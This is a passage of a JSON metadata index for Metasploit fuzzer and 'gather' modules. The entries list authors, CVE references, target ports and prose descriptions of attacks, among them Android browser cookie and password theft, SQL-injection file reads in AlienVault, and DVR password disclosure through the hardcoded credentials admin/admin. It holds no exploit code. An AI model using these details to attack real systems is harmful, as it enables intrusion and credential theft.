"ref_name": "fuzzers/smb/smb_negotiate_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_ntlm1_login_corrupt": {
"name": "SMB NTLMv1 Login Request Corruption",
"full_name": "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB login requests using\n the NTLMv1 protocol with corrupted bytes.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_ntlm1_login_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_tree_connect": {
"name": "SMB Tree Connect Request Fuzzer",
"full_name": "auxiliary/fuzzers/smb/smb_tree_connect",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB tree connect\n requests using malicious strings.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_tree_connect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_tree_connect_corrupt": {
"name": "SMB Tree Connect Request Corruption",
"full_name": "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB tree connect requests with corrupted bytes.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_tree_connect_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smtp/smtp_fuzzer": {
"name": "SMTP Simple Fuzzer",
"full_name": "auxiliary/fuzzers/smtp/smtp_fuzzer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"justme"
],
"description": "SMTP Simple Fuzzer",
"references": [
"URL-http://www.ietf.org/rfc/rfc2821.txt"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/smtp/smtp_fuzzer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ssh/ssh_kexinit_corrupt": {
"name": "SSH Key Exchange Init Corruption",
"full_name": "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SSH requests with a corrupted initial key exchange payload.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_kexinit_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ssh/ssh_version_15": {
"name": "SSH 1.5 Version Fuzzer",
"full_name": "auxiliary/fuzzers/ssh/ssh_version_15",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SSH requests with malicious version strings.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_15",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ssh/ssh_version_2": {
"name": "SSH 2.0 Version Fuzzer",
"full_name": "auxiliary/fuzzers/ssh/ssh_version_2",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SSH requests with malicious version strings.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ssh/ssh_version_corrupt": {
"name": "SSH Version Corruption",
"full_name": "auxiliary/fuzzers/ssh/ssh_version_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SSH requests with a corrupted version string",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/tds/tds_login_corrupt": {
"name": "TDS Protocol Login Request Corruption Fuzzer",
"full_name": "auxiliary/fuzzers/tds/tds_login_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of malformed TDS login requests.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/tds/tds_login_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/tds/tds_login_username": {
"name": "TDS Protocol Login Request Username Fuzzer",
"full_name": "auxiliary/fuzzers/tds/tds_login_username",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of malformed TDS login requests.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb",
"is_install_path": true,
"ref_name": "fuzzers/tds/tds_login_username",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/advantech_webaccess_creds": {
"name": "Advantech WebAccess 8.1 Post Authentication Credential Collector",
"full_name": "auxiliary/gather/advantech_webaccess_creds",
"rank": 300,
"disclosure_date": "2017-01-21",
"type": "auxiliary",
"author": [
"h00die",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.\n Although authentication is required, a user with any permission level can exploit this vulnerability.\n\n Note that 8.2 is not suitable for this.",
"references": [
"CVE-2016-5810",
"URL-https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb",
"is_install_path": true,
"ref_name": "gather/advantech_webaccess_creds",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/alienvault_iso27001_sqli": {
"name": "AlienVault Authenticated SQL Injection Arbitrary File Read",
"full_name": "auxiliary/gather/alienvault_iso27001_sqli",
"rank": 300,
"disclosure_date": "2014-03-30",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.",
"references": [
"EDB-32644"
],
"platform": "Linux",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb",
"is_install_path": true,
"ref_name": "gather/alienvault_iso27001_sqli",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/alienvault_newpolicyform_sqli": {
"name": "AlienVault Authenticated SQL Injection Arbitrary File Read",
"full_name": "auxiliary/gather/alienvault_newpolicyform_sqli",
"rank": 300,
"disclosure_date": "2014-05-09",
"type": "auxiliary",
"author": [
"Chris Hebert <chrisdhebert@gmail.com>"
],
"description": "AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against\n newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability\n to read an arbitrary file from the file system. Any authenticated user is able to exploit\n this, as administrator privileges are not required.",
"references": [
"CVE-2014-5383",
"OSVDB-106815",
"EDB-33317",
"URL-http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb",
"is_install_path": true,
"ref_name": "gather/alienvault_newpolicyform_sqli",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_browser_file_theft": {
"name": "Android Browser File Theft",
"full_name": "auxiliary/gather/android_browser_file_theft",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "This module steals the cookie, password, and autofill databases from the\n Browser application on AOSP 4.3 and below.",
"references": [
"URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0",
"URL-https://code.google.com/p/chromium/issues/detail?id=90222"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/android_browser_file_theft.rb",
"is_install_path": true,
"ref_name": "gather/android_browser_file_theft",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_browser_new_tab_cookie_theft": {
"name": "Android Browser \"Open in New Tab\" Cookie Theft",
"full_name": "auxiliary/gather/android_browser_new_tab_cookie_theft",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "In Android's stock AOSP Browser application and WebView component, the\n \"open in new tab\" functionality allows a file URL to be opened. On\n versions of Android before 4.4, the path to the sqlite cookie\n database could be specified. By saving a cookie containing a <script>\n tag and then loading the sqlite database into the browser as an HTML file,\n XSS can be achieved inside the cookie file, disclosing *all* cookies\n (HttpOnly or not) to an attacker.",
"references": [
"URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0",
"URL-http://www.rafayhackingarticles.net/2014/12/android-browser-cross-scheme-data.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb",
"is_install_path": true,
"ref_name": "gather/android_browser_new_tab_cookie_theft",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_htmlfileprovider": {
"name": "Android Content Provider File Disclosure",
"full_name": "auxiliary/gather/android_htmlfileprovider",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Thomas Cannon",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a cross-domain issue within the Android web browser to\n exfiltrate files from a vulnerable device.",
"references": [
"CVE-2010-4804",
"URL-http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/android_htmlfileprovider.rb",
"is_install_path": true,
"ref_name": "gather/android_htmlfileprovider",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_object_tag_webview_uxss": {
"name": "Android Open Source Platform (AOSP) Browser UXSS",
"full_name": "auxiliary/gather/android_object_tag_webview_uxss",
"rank": 300,
"disclosure_date": "2014-10-04",
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.",
"references": [
"URL-http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html",
"URL-https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef",
"URL-http://trac.webkit.org/changeset/96826"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/android_object_tag_webview_uxss.rb",
"is_install_path": true,
"ref_name": "gather/android_object_tag_webview_uxss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_stock_browser_uxss": {
"name": "Android Open Source Platform (AOSP) Browser UXSS",
"full_name": "auxiliary/gather/android_stock_browser_uxss",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n If your target URLs use X-Frame-Options, you can enable the \"BYPASS_XFO\" option,\n which will cause a popup window to be used. This requires a click from the user\n and is much less stealthy, but is generally harmless-looking.\n\n By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this\n module also allows running arbitrary javascript in the context of the targeted URL.\n Some sample UXSS scripts are provided in data/exploits/uxss.",
"references": [
"URL-http://1337day.com/exploit/description/22581",
"OSVDB-110664",
"CVE-2014-6041"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/gather/android_stock_browser_uxss.rb",
"is_install_path": true,
"ref_name": "gather/android_stock_browser_uxss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/apache_rave_creds": {
"name": "Apache Rave User Information Disclosure",
"full_name": "auxiliary/gather/apache_rave_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Andreas Guth",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an information disclosure in Apache Rave 0.20 and prior. The\n vulnerability exists in the RPC API, which allows any authenticated user to\n disclose information about all the users, including their password hashes. In order\n to authenticate, the user can provide his own credentials. Also the default users\n installed with Apache Rave 0.20 will be tried automatically. This module has been\n successfully tested on Apache Rave 0.20.",
"references": [
"CVE-2013-1814",
"OSVDB-91235",
"BID-58455",
"EDB-24744"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"path": "/modules/auxiliary/gather/apache_rave_creds.rb",
"is_install_path": true,
"ref_name": "gather/apache_rave_creds",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/apple_safari_ftp_url_cookie_theft": {
"name": "Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft",
"full_name": "auxiliary/gather/apple_safari_ftp_url_cookie_theft",
"rank": 300,
"disclosure_date": "2015-04-08",
"type": "auxiliary",
"author": [
"Jouko Pynnonen",
"joev <joev@metasploit.com>"
],
"description": "A vulnerability exists in versions of OSX, iOS, and Windows Safari released\n before April 8, 2015 that allows the non-HTTPOnly cookies of any\n domain to be stolen.",
"references": [
"CVE-2015-1126",
"URL-https://seclists.org/fulldisclosure/2015/Apr/30"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb",
"is_install_path": true,
"ref_name": "gather/apple_safari_ftp_url_cookie_theft",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/apple_safari_webarchive_uxss": {
"name": "Mac OS X Safari .webarchive File Format UXSS",
"full_name": "auxiliary/gather/apple_safari_webarchive_uxss",
"rank": 300,
"disclosure_date": "2013-02-22",
"type": "auxiliary",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Generates a .webarchive file for Mac OS X Safari that will attempt to\n inject cross-domain Javascript (UXSS), silently install a browser\n extension, collect user information, steal the cookie database,\n and steal arbitrary local files.\n\n When opened on the target machine the webarchive file must not have the\n quarantine attribute set, as this forces the webarchive to execute in a\n sandbox.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb",
"is_install_path": true,
"ref_name": "gather/apple_safari_webarchive_uxss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/asterisk_creds": {
"name": "Asterisk Gather Credentials",
"full_name": "auxiliary/gather/asterisk_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module retrieves SIP and IAX2 user extensions and credentials from\n Asterisk Call Manager service. Valid manager credentials are required.",
"references": [
"URL-http://www.asterisk.name/sip1.html",
"URL-http://www.asterisk.name/iax2.html",
"URL-https://www.voip-info.org/wiki/view/Asterisk+manager+API",
"URL-https://www.voip-info.org/wiki-Asterisk+CLI"
],
"platform": "",
"arch": "",
"rport": 5038,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/gather/asterisk_creds.rb",
"is_install_path": true,
"ref_name": "gather/asterisk_creds",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/avtech744_dvr_accounts": {
"name": "AVTECH 744 DVR Account Information Retrieval",
"full_name": "auxiliary/gather/avtech744_dvr_accounts",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nstarke"
],
"description": "This module will extract the account information from the AVTECH 744 DVR devices,\n including usernames, cleartext passwords, and the device PIN, along with\n a few other miscellaneous details. In order to extract the information, hardcoded\n credentials admin/admin are used. These credentials cannot be changed from either the device\n console UI or the web UI.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/avtech744_dvr_accounts.rb",
"is_install_path": true,
"ref_name": "gather/avtech744_dvr_accounts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/browser_info": {
"name": "HTTP Client Information Gather",
"full_name": "auxiliary/gather/browser_info",
"rank": 300,
"disclosure_date": "2016-03-22",
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module gathers information about a browser that exploits might be interested in, such\n as OS name, browser version, plugins, etc. By default, the module will return a fake 404,\n but you can customize this output by changing the Custom404 datastore option, and\n redirect to an external web page.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/browser_info.rb",
"is_install_path": true,
"ref_name": "gather/browser_info",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/browser_lanipleak": {
"name": "HTTP Client LAN IP Address Gather",
"full_name": "auxiliary/gather/browser_lanipleak",
"rank": 300,
"disclosure_date": "2013-09-05",
"type": "auxiliary",
"author": [
"Daniel Roesler",
"Dhiraj Mishra"
],
"description": "This module retrieves a browser's network interface IP addresses\n using WebRTC.",
"references": [
"CVE-2018-6849",
"URL-http://net.ipcalf.com/",
"URL-https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-11 01:45:41 +0000",
"path": "/modules/auxiliary/gather/browser_lanipleak.rb",
"is_install_path": true,
"ref_name": "gather/browser_lanipleak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/c2s_dvr_password_disclosure": {
"name": "C2S DVR Management Password Disclosure",
"full_name": "auxiliary/gather/c2s_dvr_password_disclosure",
"rank": 300,
"disclosure_date": "2016-08-19",
"type": "auxiliary",
"author": [
"Yakir Wizman",
"h00die"
],
"description": "C2S DVR allows an unauthenticated user to disclose the username\n & password by requesting the javascript page 'read.cgi?page=2'.\n This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.",
"references": [
"EDB-40265"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-30 20:27:19 +0000",
"path": "/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/c2s_dvr_password_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/censys_search": {
"name": "Censys Search",
"full_name": "auxiliary/gather/censys_search",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module uses the Censys REST API to access the same data\n that is accessible through the web interface. The search endpoint allows searches\n against the current data in the IPv4, Top Million Websites, and\n Certificates indexes using the same search syntax as the primary site.",
"references": [
"URL-https://censys.io/api"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/censys_search.rb",
"is_install_path": true,
"ref_name": "gather/censys_search",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/cerberus_helpdesk_hash_disclosure": {
"name": "Cerberus Helpdesk User Hash Disclosure",
"full_name": "auxiliary/gather/cerberus_helpdesk_hash_disclosure",
"rank": 300,
"disclosure_date": "2016-03-07",
"type": "auxiliary",
"author": [
"asdizzle_",
"h00die"
],
"description": "This module extracts usernames and password hashes from the Cerberus Helpdesk\n through an unauthenticated access to a workers file.\n Verified on Version 4.2.3 Stable (Build 925) and 5.4.4",
"references": [
"EDB-39526"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/cerberus_helpdesk_hash_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/checkpoint_hostname": {
"name": "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure",
"full_name": "auxiliary/gather/checkpoint_hostname",
"rank": 300,
"disclosure_date": "2011-12-14",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module sends a query to port 264/TCP on CheckPoint Firewall-1\n firewalls to obtain the firewall name and management station\n (such as SmartCenter) name via a pre-authentication request. The string\n returned is the CheckPoint Internal CA CN for SmartCenter and the firewall\n host. Whilst considered \"public\" information, the majority of installations\n use detailed hostnames which may aid an attacker in focusing on compromising\n the SmartCenter host, or prove useful for government, intelligence and military\n networks where the hostname reveals the physical location and rack number\n of the device, which may be unintentionally published to the world.",
"references": [
"URL-http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure",
"URL-https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360"
],
"platform": "",
"arch": "",
"rport": 264,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/gather/checkpoint_hostname.rb",
"is_install_path": true,
"ref_name": "gather/checkpoint_hostname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/cisco_rv320_config": {
"name": "Cisco RV320/RV326 Configuration Disclosure",
"full_name": "auxiliary/gather/cisco_rv320_config",
"rank": 300,
"disclosure_date": "2019-01-24",
"type": "auxiliary",
"author": [
"RedTeam Pentesting GmbH <release@redteam-pentesting.de>",
"Aaron Soto <asoto@rapid7.com>"
],
"description": "A vulnerability in the web-based management interface of Cisco Small Business\n RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,\n remote attacker to retrieve sensitive information. The vulnerability is due\n to improper access controls for URLs. An attacker could exploit this\n vulnerability by connecting to an affected device via HTTP or HTTPS and\n requesting specific URLs. A successful exploit could allow the attacker to\n download the router configuration or detailed diagnostic information. Cisco\n has released firmware updates that address this vulnerability.",
"references": [
"EDB-46262",
"BID-106732",
"CVE-2019-1653",
"URL-https://seclists.org/fulldisclosure/2019/Jan/52",
"URL-https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801",
"URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-13 15:45:48 +0000",
"path": "/modules/auxiliary/gather/cisco_rv320_config.rb",
"is_install_path": true,
"ref_name": "gather/cisco_rv320_config",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/citrix_published_applications": {
"name": "Citrix MetaFrame ICA Published Applications Scanner",
"full_name": "auxiliary/gather/citrix_published_applications",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to query Citrix Metaframe ICA server to obtain\n a published list of applications.",
"references": [
"URL-http://www.securiteam.com/exploits/5CP0B1F80S.html"
],
"platform": "",
"arch": "",
"rport": 1604,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/gather/citrix_published_applications.rb",
"is_install_path": true,
"ref_name": "gather/citrix_published_applications",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/citrix_published_bruteforce": {
"name": "Citrix MetaFrame ICA Published Applications Bruteforcer",
"full_name": "auxiliary/gather/citrix_published_bruteforce",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to brute force program names within the Citrix\n Metaframe ICA server.",
"references": [
"OSVDB-50617",
"BID-5817"
],
"platform": "",
"arch": "",
"rport": 1604,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
